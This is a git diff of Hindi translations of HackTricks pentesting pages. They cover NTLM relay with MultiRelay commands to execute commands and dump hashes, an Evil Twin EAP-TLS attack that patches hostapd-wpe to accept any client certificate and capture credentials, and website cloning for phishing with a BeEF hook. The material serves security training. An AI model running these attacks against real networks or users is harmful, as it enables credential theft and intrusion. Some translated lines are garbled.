- **Metasploit**: प्रॉक्सी, स्थानीय और दूरस्थ होस्ट विवरण के साथ सेटअप करें।
|
||||
- **smbrelayx**: SMB सत्रों को रिले करने और कमांड या बैकडोअर लागू करने के लिए एक Python स्क्रिप्ट।
|
||||
- **MultiRelay**: एक उपकरण Responder सुइट से, विशिष्ट उपयोगकर्ताओं या सभी उपयोगकर्ताओं को रिले करने, कमांड चलाने या हैश डंप करने के लिए।
|
||||
- **MultiRelay**: एक उपकरण Responder सुइट से, विशिष्ट उपयोगकर्ताओं या सभी उपयोगकर्ताओं को रिले करने, कमांड निष्पादित करने, या हैश डंप करने के लिए।
|
||||
|
||||
हर उपकरण को यदि आवश्यक हो तो एक SOCKS प्रॉक्सी के माध्यम से संरचित किया जा सकता है, जो अप्रत्यक्ष नेटवर्क एक्सेस के साथ भी हमले को संभावित बनाता है।
|
||||
प्रत्येक उपकरण को यदि आवश्यक हो तो एक SOCKS प्रॉक्सी के माध्यम से संचालित किया जा सकता है, जो अप्रत्यक्ष नेटवर्क एक्सेस के साथ भी हमले को संभावित बनाता है।
|
||||
|
||||
### MultiRelay ऑपरेशन
|
||||
|
||||
MultiRelay को _**/usr/share/responder/tools**_ निर्देशिका से निर्वाहित किया जाता है, विशिष्ट आईपी या उपयोगकर्ताओं को लक्षित करके।
|
||||
MultiRelay को _**/usr/share/responder/tools**_ निर्देशिका से निर्वाहित किया जाता है, विशिष्ट आईपी या उपयोगकर्ताओं को लक्ष्य बनाते हुए।
|
||||
```bash
|
||||
python MultiRelay.py -t <IP target> -u ALL # Relay all users
|
||||
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
|
||||
|
@ -110,9 +111,9 @@ python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes
|
|||
|
||||
# Proxychains for routing traffic
|
||||
```
|
||||
### Force NTLM Logins
|
||||
### एनटीएलएम रिले हमले का प्रयास करें
|
||||
|
||||
Windows में आपको **कुछ विशेषाधिकारी खातों को विभिन्न मशीनों पर प्रमाणीकृत करने के लिए मजबूर किया जा सकता है**। निम्नलिखित पृष्ठ को पढ़ें और जानें कैसे:
|
||||
Windows में आप **कुछ विशेषाधिकारी खातों को अनियमित मशीनों पर प्रमाणीकृत करने के लिए सक्षम हो सकते हैं**। निम्नलिखित पृष्ठ को पढ़ें और जानें कैसे:
|
||||
|
||||
{% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %}
|
||||
[printers-spooler-service-abuse.md](../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md)
|
||||
|
@ -126,16 +127,17 @@ Windows में आपको **कुछ विशेषाधिकारी
|
|||
* [https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) वाले [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** को** **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,55 +1,56 @@
|
|||
# ईविल ट्विन EAP-TLS
|
||||
# शैतान ट्विन EAP-TLS
|
||||
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>HackTricks का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **हमें** **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
|
||||
**बग बाउंटी टिप**: **Intigriti** के लिए **साइन अप करें**, एक प्रीमियम **बग बाउंटी प्लेटफॉर्म जो हैकर्स द्वारा बनाई गई है**! हमारे साथ जुड़ें [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) आज ही, और शुरू करें बाउंटी अप तक **$100,000** तक कमाना!
|
||||
**बग बाउंटी टिप**: **Intigriti** के लिए **साइन अप** करें, एक प्रीमियम **बग बाउंटी प्लेटफॉर्म जो हैकर्स द्वारा बनाई गई है**! हमारे साथ जुड़ें [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) आज ही, और शुरू करें बाउंटी अप तक **$100,000** तक कमाना!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
||||
किसी समय मुझे नीचे पोस्ट द्वारा प्रस्तावित समाधान का उपयोग करने की आवश्यकता पड़ी, लेकिन [https://github.com/OpenSecurityResearch/hostapd-wpe](https://github.com/OpenSecurityResearch/hostapd-wpe) में दिए गए चरण मॉडर्न काली (2019v3) में काम नहीं कर रहे थे।\
|
||||
फिर भी, उन्हें काम कराना आसान था।\
|
||||
फिर भी, उन्हें काम करने में आसान है।\
|
||||
आपको केवल यहाँ से hostapd-2.6 डाउनलोड करने की आवश्यकता है: [https://w1.fi/releases/](https://w1.fi/releases/) और पुनः hostapd-wpe कंपाइल करने से पहले इंस्टॉल करें: `apt-get install libssl1.0-dev`
|
||||
|
||||
### वायरलेस नेटवर्क्स में EAP-TLS का विश्लेषण और शोषण
|
||||
### वायरलेस नेटवर्क में EAP-TLS का विश्लेषण और शोषण
|
||||
|
||||
#### पृष्ठभूमि: वायरलेस नेटवर्क्स में EAP-TLS
|
||||
EAP-TLS एक सुरक्षा प्रोटोकॉल है जो प्रमाणपत्रों का उपयोग करके क्लाइंट और सर्वर के बीच सापेक्ष प्रमाणीकरण प्रदान करता है। कनेक्शन केवल तब स्थापित होता है अगर क्लाइंट और सर्वर एक-दूसरे के प्रमाणपत्रों का प्रमाणीकरण करते हैं।
|
||||
#### पृष्ठभूमि: वायरलेस नेटवर्क में EAP-TLS
|
||||
EAP-TLS एक सुरक्षा प्रोटोकॉल है जो प्रमाणीकरण प्रदान करता है जो सर्टिफिकेट का उपयोग करके क्लाइंट और सर्वर के बीच सामंजस्यपूर्ण प्रमाणीकरण प्रदान करता है। कनेक्शन केवल तब स्थापित होता है अगर क्लाइंट और सर्वर एक-दूसरे के सर्टिफिकेटों का प्रमाणीकरण करते हैं।
|
||||
|
||||
#### चुनौती
|
||||
मूल्यांकन के दौरान, `hostapd-wpe` टूल का उपयोग करते समय एक दिलचस्प त्रुटि का सामना किया गया। टूल ने क्लाइंट कनेक्शन को अस्वीकार कर दिया क्योंकि क्लाइंट का प्रमाणपत्र एक अज्ञात प्रमाणपत्रिका प्राधिकरण (CA) द्वारा हस्ताक्षरित था। इससे पता चला कि क्लाइंट ने नकली सर्वर के प्रमाणपत्र को विश्वसनीय मानते थे, जो क्लाइंट साइड पर ढीली सुरक्षा विन्यासों की ओर इशारा कर रहा था।
|
||||
#### चुनौती का सामना
|
||||
मूल्यांकन के दौरान, `hostapd-wpe` टूल का उपयोग करते समय एक दिलचस्प त्रुटि का सामना किया गया। टूल ने क्लाइंट कनेक्शन को अस्वीकार कर दिया क्योंकि क्लाइंट का सर्टिफिकेट एक अज्ञात प्रमाण प्राधिकरण (CA) द्वारा हस्ताक्षरित था। इससे पता चला कि क्लाइंट ने नकली सर्वर के सर्टिफिकेट पर विश्वास किया था, जो क्लाइंट की ओर से ढीली सुरक्षा विन्यासों की ओर इशारा कर रहा था।
|
||||
|
||||
#### उद्देश्य: मैन-इन-द-मिडिल (MiTM) हमला सेटअप
|
||||
लक्ष्य यह था कि टूल को संशोधित किया जाए ताकि किसी भी क्लाइंट प्रमाणपत्र को स्वीकार किया जा सके। यह नकली वायरलेस नेटवर्क से कनेक्शन स्थापित करने और एक MiTM हमला संभवतः प्लेइनटेक्स्ट क्रेडेंशियल्स या अन्य संवेदनशील डेटा को कैप्चर करने की अनुमति देगा।
|
||||
#### उद्देश्य: मैन-इन-द-मिडिल (MiTM) हमला सेटअप करना
|
||||
लक्ष्य यह था कि टूल को संशोधित किया जाए ताकि किसी भी क्लाइंट सर्टिफिकेट को स्वीकार किया जा सके। यह नकली वायरलेस नेटवर्क के साथ कनेक्शन स्थापित करने और एक MiTM हमला संभवतः प्लेइनटेक्स्ट क्रेडेंशियल्स या अन्य संवेदनशील डेटा को कैप्चर करने की अनुमति देगा।
|
||||
|
||||
#### समाधान: `hostapd-wpe` को संशोधित करना
|
||||
`hostapd-wpe` के स्रोत कोड का विश्लेषण ने दिखाया कि क्लाइंट प्रमाणपत्र मान्यता को नियंत्रित करने वाला एक पैरामीटर (`verify_peer`) OpenSSL फ़ंक्शन `SSL_set_verify` में था। इस पैरामीटर के मान को 1 से (मान्यता देना) 0 पर (मान्यता न देना) बदलकर, टूल को किसी भी क्लाइंट प्रमाणपत्र को स्वीकार करने के लिए बनाया गया था।
|
||||
`hostapd-wpe` के स्रोत कोड का विश्लेषण उज्ज्वल किया कि क्लाइंट सर्टिफिकेट प्रमाणीकरण को एक पैरामीटर (`verify_peer`) द्वारा नियंत्रित किया गया था जो OpenSSL फ़ंक्शन `SSL_set_verify` में था। इस पैरामीटर के मान को 1 (प्रमाणीकरण) से 0 (प्रमाणीकरण न करें) में बदलकर, टूल को किसी भी क्लाइंट सर्टिफिकेट को स्वीकार करने के लिए बनाया गया था।
|
||||
|
||||
#### हमले का क्रियान्वयन
|
||||
1. **पर्यावरण जांच:** वायरलेस नेटवर्क्स को मॉनिटर करने और लक्ष्यों की पहचान के लिए `airodump-ng` का उपयोग करें।
|
||||
2. **नकली एपी सेटअप:** संशोधित `hostapd-wpe` चलाएं ताकि लक्ष्य नेटवर्क की नकली एक्सेस प्वाइंट (AP) बनाई जा सके।
|
||||
1. **पर्यावरण की जाँच:** वायरलेस नेटवर्कों को मॉनिटर करने और लक्ष्यों की पहचान के लिए `airodump-ng` का उपयोग करें।
|
||||
2. **नकली एपी सेटअप:** संशोधित `hostapd-wpe` को चलाएं ताकि लक्ष्य नेटवर्क की नकली एक्सेस प्वाइंट (AP) बनाई जा सके।
|
||||
3. **कैप्टिव पोर्टल कस्टमाइजेशन:** कैप्टिव पोर्टल के लॉगिन पेज को मान्य और लक्ष्य उपयोगकर्ता के लिए परिचित दिखाने के लिए अनुकूलित करें।
|
||||
4. **डी-ऑथेंटिकेशन हमला:** वैकल्पिक रूप से, वास्तविक नेटवर्क से क्लाइंट को डिस्कनेक्ट करने और उन्हें नकली एपी से कनेक्ट करने के लिए डी-ऑथ हमला करें।
|
||||
5. **क्रेडेंशियल्स कैप्चरिंग:** जब क्लाइंट नकली एपी से कनेक्ट होता है और कैप्टिव पोर्टल के साथ इंटरैक्ट करता है, तो उनके क्रेडेंशियल्स कैप्चर होते हैं।
|
||||
4. **डी-ऑथेंटिकेशन हमला:** वैकल्पिक रूप से, एक डी-ऑथ हमला करें ताकि क्लाइंट को वास्तविक नेटवर्क से डिस्कनेक्ट किया जा सके और उन्हें नकली एपी से कनेक्ट किया जा सके।
|
||||
5. **क्रेडेंशियल्स कैप्चर करना:** एक बार क्लाइंट नकली एपी से कनेक्ट होता है और कैप्टिव पोर्टल के साथ इंटरैक्ट करता है, उनके क्रेडेंशियल्स कैप्चर हो जाते हैं।
|
||||
|
||||
#### हमले से अवलोकन
|
||||
- विंडोज मशीनों पर, सिस्टम स्वचालित रूप से नकली एपी से कनेक्ट हो सकता है, जब वेब नेविगेशन का प्रयास किया जाता है तो कैप्टिव पोर्टल प्रस्तुत किया जा सकता है।
|
||||
- एक iPhone पर, उपयोगकर्ता को एक नया प्रमाणपत्र स्वीकार करने के लिए प्रोत्साहित किया जा सकता है और फिर कैप्टिव पोर्टल प्रस्तुत किया जा सकता है।
|
||||
- एक iPhone पर, उपयोगकर्ता को एक नया सर्टिफिकेट स्वीकार करने के लिए प्रोत्साहित किया जा सकता है और फिर कैप्टिव पोर्टल प्रस्तुत किया जा सकता है।
|
||||
|
||||
#### निष्कर्ष
|
||||
हालांकि EAP-TLS को सुरक्षित माना जाता है, इसकी प्रभावशीलता अंत उपयोगकर्ताओं के सही विन्यास और सतर्क व्यवहार पर निर्भर करती है। गलत रूप से विन्यस्त उपकरण या अनजाने उपयोगकर्ता नकली प्रमाणपत्रों को स्वीकार करने से EAP-TLS सुरक्षित नेटवर्क की सुरक्षा को कमजोर कर सकते हैं।
|
||||
हालांकि EAP-TLS को सुरक्षित माना जाता है, इसकी प्रभावकारिता मुख्य रूप से सही विन्यास और अंत उपयोगकर्ताओं के सतर्क व्यवहार पर निर्भर करती है। गलत रूप से कॉन्फ़िगर किए गए उपकरण या अनजाने में रोगी स्वीकार करने से EAP-TLS से सुरक्षा को खतरे में डाल सकते हैं।
|
||||
|
||||
अधिक विवरण के लिए देखें https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/
|
||||
|
||||
|
@ -57,14 +58,10 @@ EAP-TLS एक सुरक्षा प्रोटोकॉल है जो
|
|||
* [https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/](https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/)
|
||||
|
||||
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
|
||||
**बग बाउंटी टिप**: **Intigriti** के लिए **साइन अप करें**, एक प्रीमियम **बग बाउंटी प्लेटफॉर्म जो हैकर्स द्वारा बनाई गई है**! हमारे साथ जुड़ें [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) आज ही, और शुरू करें बाउंटी अप तक **$100,000** तक कमाना!
|
||||
**बग बाउंटी टिप**: **Intigriti** के लिए **साइन अप** करें, एक प्रीमियम **बग बाउंटी प्लेटफॉर्म जो हैकर्स द्वारा बनाई गई है**! हमारे साथ जुड़ें [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) आज ही, और शुरू करें बाउंटी अप तक **$100,000** तक कमाना!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**
|
||||
|
|
|
@ -1,16 +1,17 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ</strong>!</summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **Twitter** पर फॉलो करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें और PRs सबमिट करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सब्सक्रिप्शन योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -20,9 +21,9 @@ HackTricks का समर्थन करने के अन्य तरी
|
|||
|
||||
फिशिंग मूल्यांकन के लिए कभी-कभी पूरी तरह से **एक वेबसाइट क्लोन** करना उपयोगी हो सकता है।
|
||||
|
||||
ध्यान दें कि आप क्लोन की गई वेबसाइट में कुछ payloads भी जोड़ सकते हैं जैसे एक BeEF हुक ताकि उपयोगकर्ता के टैब को "नियंत्रित" किया जा सके।
|
||||
ध्यान दें कि आप क्लोन की गई वेबसाइट में कुछ पेयलोड भी जोड़ सकते हैं जैसे एक बीईईएफ हुक ताकि उपयोगकर्ता के टैब को "नियंत्रित" किया जा सके।
|
||||
|
||||
इस उद्देश्य के लिए आप विभिन्न उपकरणों का उपयोग कर सकते हैं:
|
||||
इस उद्देश्य के लिए आप विभिन्न उपकरण प्रयोग कर सकते हैं:
|
||||
|
||||
## wget
|
||||
```text
|
||||
|
@ -33,7 +34,7 @@ wget -mk -nH
|
|||
#https://github.com/imthaghost/goclone
|
||||
goclone <url>
|
||||
```
|
||||
## सोशल इंजीनियरिंग टूलकिट
|
||||
## सामाजिक इंजीनियरिंग टूलकिट
|
||||
```bash
|
||||
#https://github.com/trustedsec/social-engineer-toolkit
|
||||
```
|
||||
|
@ -42,16 +43,17 @@ goclone <url>
|
|||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) जांचें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर हमें **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,30 +1,31 @@
|
|||
# मूल Python
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सदस्यता योजनाएं देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 पर **फॉलो** करें **@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## Python Basics
|
||||
|
||||
### उपयोगी जानकारी
|
||||
|
||||
list(xrange()) == range() --> Python3 में range Python2 का xrange है (यह एक सूचकक है न कि एक सूची)\
|
||||
एक Tuple और एक List के बीच अंतर यह है कि एक Tuple में एक मान की स्थिति का मतलब होता है लेकिन सूचियों में केवल क्रमबद्ध मान होते हैं। Tuples में संरचनाएँ होती हैं लेकिन सूचियों में क्रम होता है।
|
||||
list(xrange()) == range() --> Python3 में range python2 का xrange है (यह एक सूचककर्ता है न कि एक सूची)\
|
||||
एक Tuple और एक List के बीच अंतर यह है कि एक मान की स्थिति एक Tuple में उसे अर्थ देती है लेकिन सूचियों में केवल क्रमबद्ध मान होते हैं। Tuples में संरचनाएँ होती हैं लेकिन सूचियों में क्रम होता है।
|
||||
|
||||
### मुख्य ऑपरेशन
|
||||
